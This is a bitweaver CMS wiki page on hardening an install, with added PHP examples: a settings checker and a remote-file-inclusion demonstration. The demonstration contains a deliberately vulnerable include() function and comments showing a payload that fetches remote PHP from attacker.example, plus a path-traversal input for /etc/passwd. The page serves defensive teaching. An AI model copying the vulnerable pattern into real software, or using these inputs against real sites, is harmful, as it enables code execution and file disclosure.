Security (page history: version 1)

bitweaver security settings

Created by: laetzer, Last modification: 05 Feb 2008 (08:50 UTC) by laetzer

Bitweaver 2


security settings

  • in /kernel/config_inc.php the parameter IS_LIVE should be true (it is true by default); with it set to false, PHP error messages are shown to every visitor instead of being mailed to the admin
  • rename your /install/ directory after installation, so the installer cannot be run again by anyone who finds it
  • harden your PHP configuration (links)
  • harden Apache (links)
  • anonymous users should not be allowed to attach arbitrary files to wiki pages or other content
  • if comments are enabled anywhere, also enable HTMLPurifier; it strips malicious markup (script tags and the like) from user-submitted HTML
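As an added example (this is not bitweaver's own code), the following script checks the items above against a running installation. It assumes that IS_LIVE is declared with define('IS_LIVE', ...) in kernel/config_inc.php, that the script is placed in the bitweaver root, and that the php.ini keys it inspects are what "harden your PHP configuration" refers to; the function name checkBitweaverSecurity is made up for this example.

```php
<?php
// Added example, not part of bitweaver: a preflight check for the settings listed above.
// Assumptions: IS_LIVE is declared via define('IS_LIVE', ...) in kernel/config_inc.php,
// this file sits in the bitweaver root, and the php.ini keys below are the ones meant by
// "harden your PHP configuration". Run with: php security_check.php
declare(strict_types=1);

/**
 * Return findings as [severity, message] pairs; an empty array means every check passed.
 */
function checkBitweaverSecurity(string $root): array
{
    $findings = [];

    // 1. IS_LIVE must be true: with false, PHP errors are shown to every visitor
    //    instead of being mailed to the admin.
    $configFile = $root . '/kernel/config_inc.php';
    if (is_readable($configFile)) {
        $src = (string) file_get_contents($configFile);
        if (preg_match('/define\s*\(\s*[\'"]IS_LIVE[\'"]\s*,\s*(true|false)\s*\)/i', $src, $m)) {
            if (strtolower($m[1]) !== 'true') {
                $findings[] = ['high', 'IS_LIVE is false in kernel/config_inc.php: error output reaches visitors'];
            }
        } else {
            $findings[] = ['info', 'no define(IS_LIVE, ...) found in kernel/config_inc.php; verify by hand'];
        }
    } else {
        $findings[] = ['info', "cannot read $configFile; run this from the bitweaver root"];
    }

    // 2. The installer directory must be gone (renamed) once installation is complete.
    if (is_dir($root . '/install')) {
        $findings[] = ['high', '/install/ still exists: rename it so the installer cannot be re-run'];
    }

    // 3. php.ini settings relevant to include()-style attacks and information leaks.
    //    Format: setting => [should it be enabled?, reason]
    $wanted = [
        'allow_url_include' => [false, 'include() of remote URLs is the attack described under "hacking attempts"'],
        'allow_url_fopen'   => [false, 'remote fopen() wrappers are rarely needed by a CMS'],
        'display_errors'    => [false, 'error output leaks paths and queries to visitors'],
        'expose_php'        => [false, 'the X-Powered-By header advertises the PHP version'],
    ];
    foreach ($wanted as $name => [$shouldBeOn, $why]) {
        $raw = ini_get($name);
        // ini_get() reports booleans as "1" or as "", "0", "off" depending on how php.ini spelled them.
        $isOn = $raw !== false && !in_array(strtolower($raw), ['', '0', 'off', 'false', 'no'], true);
        if ($isOn !== $shouldBeOn) {
            $findings[] = ['medium', sprintf('php.ini: %s is %s (%s)', $name, $isOn ? 'On' : 'Off', $why)];
        }
    }

    return $findings;
}

// Command-line entry point: print the findings and exit non-zero if anything needs attention.
if (PHP_SAPI === 'cli' && realpath($argv[0]) === __FILE__) {
    $findings = checkBitweaverSecurity(__DIR__);
    foreach ($findings as [$severity, $message]) {
        echo strtoupper($severity), ': ', $message, PHP_EOL;
    }
    exit($findings === [] ? 0 : 1);
}
```

Run it from the command line with the same PHP binary and php.ini that the web server uses; a CLI php.ini often differs from the web one, so for the ini checks the safest approach is to run the script through the web server once (or compare against phpinfo() output served by Apache) and then delete it.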

security alerts

(some examples of security issues that were reported, and how they have been addressed or why they do not apply)

hacking attempts

unknown column/sort order

The script-kiddie plague du jour is trying to exploit code of the form include( $varWithSomeUrlFromGetString ); which would fetch and execute PHP written by the attacker. If such an attack is attempted against a bitweaver install, it might mail an error message to you, the admin. Note that a normal user browsing your pages will never see an error message unless you set IS_LIVE to false in /kernel/config_inc.php (by default it is true). Also, the error mail is essentially telling you that the attempted hack failed, i.e. that it did nothing.
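The pattern in that paragraph, written out as an added example (this is not bitweaver's code), next to a hardened replacement. The query parameter page, the pages/ directory, the allow-list of page names and the function names are assumptions made for this illustration.

```php
<?php
// Added example, not part of bitweaver: the include() pattern the paragraph describes,
// next to a hardened version. The 'page' parameter, the pages/ directory and the
// allow-list contents are assumptions made for this illustration.
declare(strict_types=1);

// VULNERABLE (the shape the paragraph warns about; do not deploy).
// With allow_url_include=On, ?page=http://attacker.example/x.txt fetches and runs remote PHP.
// Even with it Off, ?page=../../../etc/passwd still includes an arbitrary local file.
function vulnerableInclude(array $get): void
{
    include($get['page']);
}

/**
 * Map a requested page name to a file inside $pagesDir, or return null to refuse it.
 * The allow-list, not any filtering of the input, decides what may be included.
 */
function resolvePage($requested, string $pagesDir, array $allowed): ?string
{
    // ?page[]=x arrives as an array; anything that is not a plain string is refused.
    if (!is_string($requested) || !in_array($requested, $allowed, true)) {
        return null;
    }
    $base = realpath($pagesDir);
    $path = realpath($pagesDir . '/' . $requested . '.php');
    // realpath() resolves symlinks, so the final check is on the real location:
    // the resolved file must sit directly under the real pages directory.
    if ($base === false || $path === false || dirname($path) !== $base) {
        return null;
    }
    return $path;
}

function hardenedInclude(array $get, string $pagesDir): void
{
    $allowed = ['home', 'about', 'contact'];   // assumption: the site's real page list
    $path = resolvePage($get['page'] ?? 'home', $pagesDir, $allowed);
    if ($path === null) {
        // Behave as the page describes: the attempt is recorded for the admin,
        // the visitor gets no informative error (IS_LIVE=true behaviour), and nothing runs.
        error_log('rejected include request: ' . var_export($get['page'] ?? null, true));
        http_response_code(404);
        return;
    }
    include $path;
}

// Usage from a front controller, e.g. index.php:
//   hardenedInclude($_GET, __DIR__ . '/pages');
```

Keeping allow_url_include = Off in php.ini (and IS_LIVE true) is still worthwhile as defence in depth: the allow-list stops the attack on its own, but the ini setting also covers any other code on the server that still passes request data to include().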

Bitweaver 1.3 and before

Bitweaver's 1.x versions were released in 2004 and the beginning of 2005 (see bitweaverRoadMap). These versions are really old now and no longer well supported. They had some serious security issues, many of which came from 3rd-party code: left-over code from older versions, the infamous Xmlrpc bug, and others. These, together with bitweaver's own bugs, gave it quite a bad reputation at times. Many of the improvements introduced with bitweaver 2 therefore addressed these issues specifically. In other words, don't install version 1.3 anymore. If you are running version 1.3 and are concerned about security, consider upgrading bitweaver.
Page History

Date/Comment                          User            IP             Version
13 Feb 2010 (19:57 UTC), added alias  laetzer         85.178.0.170   6 (current)
-                                     Benjamin Couhe  80.4.75.27     5
-                                     laetzer         141.20.150.43  4
-                                     laetzer         141.20.150.43  3
-                                     laetzer         85.178.63.167  2
-                                     laetzer         85.178.3.165   1